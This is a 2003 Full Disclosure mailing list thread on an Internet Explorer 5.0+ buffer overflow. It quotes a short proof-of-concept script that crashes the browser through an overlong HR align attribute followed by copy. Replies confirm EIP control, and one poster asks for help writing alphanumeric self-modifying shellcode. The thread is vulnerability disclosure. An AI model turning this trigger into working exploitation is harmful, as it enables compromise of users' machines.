Full Disclosure mailing list archives

RE: Re: Internet Explorer >=5.0 : Buffer overflow

From: "Rick" <rikul () bellsouth net>
Date: Wed, 25 Jun 2003 11:13:05 -0600

I got as far as having it jmp to shellcode with byte range 0x20 to 0x7f
I suppose if you have enough space these should be sufficient to create
self modifying shellcode which does something important. Does anyone
know good papers or resource for something like that? 

- Rick Patel


-----Original Message-----
From: full-disclosure-admin () lists netsys com
[mailto:full-disclosure-admin () lists netsys com] On Behalf Of SecurITeam
BugTraq Monitoring
Sent: Wednesday, June 25, 2003 5:05 AM
To: KF; Digital Scream
Cc: full-disclosure () lists netsys com
Subject: [Full-disclosure] Re: Internet Explorer >=5.0 : Buffer overflow

Hi,

I can confirm it under Windows 2000 with IE 5.50.4807.2300

Full control over the EIP, but the shellcode cannot contain (as it
currently
appears) non Alpha Numeric characters, too bad I guess.

Thanks
Noam Rathaus
CTO
Beyond Security Ltd
http://www.SecurITeam.com
http://www.BeyondSecurity.com
----- Original Message -----
From: "KF" <dotslash () snosoft com>
To: "Digital Scream" <digitalscream () real xakep ru>
Sent: Monday, June 23, 2003 6:43 PM
Subject: Re: Internet Explorer >=5.0 : Buffer overflow

I can confirm this on Windows XP Professional

version 6.0.2800.1106.xpsp2-030422-1633

0x43534c41 refrenced mem at 0x43534c41
-KF


Digital Scream wrote:

&lt;script&gt;
wnd=open("about:blank","","");
wnd.moveTo(screen.Width,screen.Height);
WndDoc=wnd.document;
WndDoc.open();
WndDoc.clear();
buffer="";
for(i=1;i<=127;i++)buffer+="X";
buffer+="DigitalScream";
WndDoc.write("<HR align='"+buffer+"'>");
WndDoc.execCommand("SelectAll");
WndDoc.execCommand("Copy");
wnd.close();
&lt;/script&gt;

Grtz: Nj3l, buggzy, 3APA3A, Void Team, X - Crew


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Current thread:

Re: Internet Explorer >=5.0 : Buffer overflow SecurITeam BugTraq Monitoring (Jun 25)
- Re: Re: Internet Explorer >=5.0 : Buffer overflow Philippe Biondi (Jun 25)
- RE: Re: Internet Explorer >=5.0 : Buffer overflow Rick (Jun 25)
- Re: Re: Internet Explorer >=5.0 : Buffer overflow 3APA3A (Jun 30)